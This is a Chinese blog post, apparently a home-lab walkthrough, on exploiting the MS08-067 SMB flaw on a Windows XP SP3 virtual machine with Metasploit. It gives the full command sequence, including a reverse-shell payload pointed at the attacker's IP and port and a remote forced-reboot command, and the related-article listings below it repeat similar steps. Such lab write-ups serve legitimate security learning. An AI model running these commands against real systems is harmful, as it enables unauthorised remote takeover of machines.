metasploit 框架之利用 ms08_067 漏洞渗透Windows XP SP3 Chinese - Simplified (NX)实验过程及错误处理

最新推荐文章于 2024-07-06 09:49:08 发布
最新推荐文章于 2024-07-06 09:49:08 发布
阅读量2.4w 收藏 23
点赞数 5
分类专栏: kali渗透工具集 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/max_ii_min/article/details/104380097
版权

1:渗透目标

查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。

2:准备阶段

2.1软件

Kali linux (链接:https://pan.baidu.com/s/194FMaauJK_CVughVMxGfHA 提取码:7ygg )

Windows XP SP3 Chinese - Simplified (NX)(链接:https://pan.baidu.com/s/1USopQg9CTrFv1ABuZ2kAHg 提取码:3oxp​​​)

vmware 15 pro(官网可以下载)

 

2.2网络配置如下

Windows XP SP3 Chinese - Simplified (NX)  操作系统

 

kali 2019a

 

2.3 xp系统设置(两个关闭,三个打开)

(关闭自动更新)(关闭防火墙)否则会一直报连接超时的错误

 

打开三个服务(computer browser)(server)(workstation)

 

3:渗透测试阶段

3.1:整体流程图

 

3.2:执行阶段

1):查找漏洞(可在网上查找公开的平台漏洞)

命令:search ms08_067

 

2):选择rank等级较高的模块(这里只有一个模块),并选中模块

命令:use exploit/windows/smb/ms08_067_netapi

#上面的意思是:

exploit 可渗透攻击的模块

Windows 操作系统类型

smb

ms08_067_netapi漏洞名称

 

查看该模块的信息

命令:info

 

3):查找该漏洞可复现的操作系统类型

命令:show targets

 

这里我们利用第 34 个操作系统类型进行漏洞复现

 

4):查看该模块需要配置的参数

命令:show options

 

required 项为 yes 的为必填项

RHOSTS   要攻击的目标 IP

RPORT   要攻击的目标端口

设置要攻击的 目标ip

命令:set RHOSTS 192.168.0.100

 

查看配置参数

命令:show options

 

5):查找可用的攻击载荷

命令:show payloads

 

选择合适的攻击载荷并设置攻击载荷

命令:set payload generic/shell_reverse_tcp

 

设置攻击机的ip

命令:set lhost 192.168.0.104

设置攻击机的端口

命令:set lport 4567

 

设置目标ID(重要命令,一定要写的,不然没法连接)

命令:set target 34

run 之前再看一眼配置

 

6):开始渗透:

命令:exploit

3.3渗透完成

测试命令

重启xp

命令:shutdown -r -f -t 0

Dir查看当前文件夹

 

4:总结

从早做到晚

开始忽略了防火墙和自动更新问题

网上查找资料时,好几个解决方案弄混淆了,最后自己都不知道有些东西做没做

不知道系统会崩溃,不可逆转性崩溃

忘记给虚拟机做快照了,最后只好重做系统,设置快照

 

 

 

o1uncle
关注
  • 5
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
ms08-067漏洞复现
2302_79119987的博客
04-09 1197
漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出。向靶机发送大量数据,造成缓冲区溢出,渗透成功获得权限,使用shell命令。
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 5190
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
基于Windows XP SP3系统下MS08067漏洞攻击
Lorezon的博客
11-21 1726
0x00 写在前面 MS08_067是一个很经典的漏洞,是我了解网安时候接触到的第一个漏洞。只不过那时候什么都不懂。其实很久之前就想写一篇08067漏洞,但是靶机一直有问题,就一直在拖延。现在终于有机会了。不多说,直接搞。 0x01扫描漏洞 0x02启用msf,查找08067 0x03利用模块 0x04 show payloads查找攻击载荷 可以看到有很多的载荷,我们选用返回shell...
Windows xp Ms08067漏洞复现
hintll的博客
11-18 4066
准备工作: 虚拟机 kali Windows xp sp3中文版 先ping双方的ip,以确保双方的网络可以互通 nmap扫描Windows 命令: cd /usr/share/nmap/scripts nmap --script=vuln 192.168.XXX.XXX 扫描后有漏洞ms08067 用mts进行攻击 先找漏洞利用: search 08_067 运用漏洞: use exploit/windowsexploit/windows/smb/ms08_067_netapi 看参数: show op
利用ms08-067漏洞入侵靶机(win xp2) 并利用meterpreter进行深入渗透
xxwn202302的博客
08-09 560
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XPWindows Server 2003 系统上,攻击者可能未经身份验证即可利用漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。
渗透- 基于metasploit的内网渗透 - ms08-067漏洞利用及其原理分析
joke_ljh的博客
08-31 2396
ms08-067漏洞利用 内网渗透利用漏洞Ms08-067 使用工具metasploit 前提:靶机具有ms08-067漏洞(可以用nessus扫描),在同一局域网,且具有连通性。 基本命令: Use exploit/windows/smb/ms08_067_netapi Set rhost 192.168.10.2 Set lhost 192.168.10.1 Set lport 7777...
利用metasploit通过ms_08_067_netapi漏洞渗透winXp
cool_jia的博客
12-19 2592
攻击主机为装了metasploit的win10 目标主机为虚拟机中的winxp专业版sp3(需要关闭防火墙) 虚拟机中系统采用的桥接方式 1.启动metasploit 2.使用ms_08_067_netapi渗透模块,并查看信息 3.查看可用的攻击载荷 4.选择攻击载荷generic/shell_bind_tcp(此处就是要获取对方的控制台),查看有哪些参数要设置 5
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
利用win系统ms08-067漏洞.docx
10-26
在本实验中,我们将使用虚拟机_win2000和Kali Linux来演示MS08-067漏洞利用过程。首先,我们需要安装好_win2000虚拟机,并确保其网络设置正确。然后,我们需要安装Metasploit框架在Kali Linux中,以便我们可以使用...
rtx_doc_exploit:利用MS14-017漏洞利用
05-09
rtx_doc_exploit 利用MS14-017漏洞利用还有一个metasploit模块可以执行以下操作: ://www.rapid7.com/db/modules/exploit/windows/fileformat/ms14_017_rtf 我从研究人员那里得到了这个python示例。 到现在为止,...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
Metasploit是一款强大的渗透测试工具,其核心在于Exploit框架,可以有效地帮助网络安全专业人员发现、分析和利用系统漏洞。"pitchw9a"可能指的是一个特定的漏洞或exploit模块,它可能是Metasploit框架中的一个重要...
metasploit实验报告及漏洞利用代码
01-11
Metasploit是一款强大的安全渗透测试工具,主要用于模拟攻击和检测系统漏洞。它是开源社区的瑰宝,由 Rapid7 维护,并且在全球范围内被安全研究人员、渗透测试人员以及网络安全专业人员广泛使用。本实验报告将深入...
渗透测试-[windows-MS08-067、MS10-046、MS17-010、MS12-020]
m0_43405474的博客
05-05 2959
【MS漏洞攻击实验-MS08-067、MS10-046、MS17-010、MS-12-020】0.实验环境1.MS08-067【RPC】1.1 漏洞描述1.2 主机发现1.3 利用MSF通过ms08-067漏洞渗透目标系统1.4 后渗透利用1.查看权限:2.Shell3.添加账号4.将新账号添加到管理员组中5.截屏2.MS10-046【快捷方式自动执行代码】2.1 漏洞描述2.2 渗透攻击2.3 后渗透利用3.MS17-010【SMB】3.1 漏洞描述3.2 渗透攻击3.2.1 目标发现3.2.2 渗透攻击
微软服务器代码执行漏洞复现,远程代码执行MS08-067漏洞复现失败过程
weixin_39959615的博客
08-12 679
远程代码执行MS08-067漏洞复现失败过程漏洞描述:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在微软服务器系统上,攻击者可能未经身份验证即可利用漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。漏洞原理:MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPath...
[网络安全自学篇] 五十九.Windows安全缺陷利用MS08-067远程代码执行及深度防御解析
热门推荐
杨秀璋的专栏
03-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Windows远程桌面服务漏洞(CVE-2019-0708)复现,利用RDP和Metasploit工具反弹shell。本文将讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口,并通过Metasploit工具获取shell及进行深入的操作。本文是一篇CVE漏洞还原的基础性文章,希望对您有所
MS08-067漏洞分析
10-27 3928
 by diyhack 前天看到微软紧急发布了一个漏洞补丁,就去看了下,发现该漏洞影响覆盖面非常广,包括Windows 2000/XP/2003/Vista/2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta,并且漏洞存在于Windows系统默认开启的Server服务当中,而且超越了当年风靡一时的MS06-040漏洞(又想起当年用该漏洞。。。。。。。嘿嘿)。这也难
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
ms17-010 ms10-046 ms08-067漏洞利用
weixin_43227251的博客
01-13 1643
2020年1月7日 好了,到了第二天,早上起来的时候心情就是那么的激动 为什么呢,昨天熬夜到3点,终于吧环境搞好了,哎,我太难了! 今天一天主要做的事情是利用kali进行漏洞利用,具体利用过程和步骤如下: ms17-010,ms08-067,ms10-046漏洞利用 一. ms17-010 1.漏洞成因:当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个...
linux/shell】linux如何去除字符串中空格
最新发布
qq_35902025的博客
07-06 416
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
计算机系统安全-实验二-metasploit.doc
12-10
计算机系统安全-实验二-metasploit.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值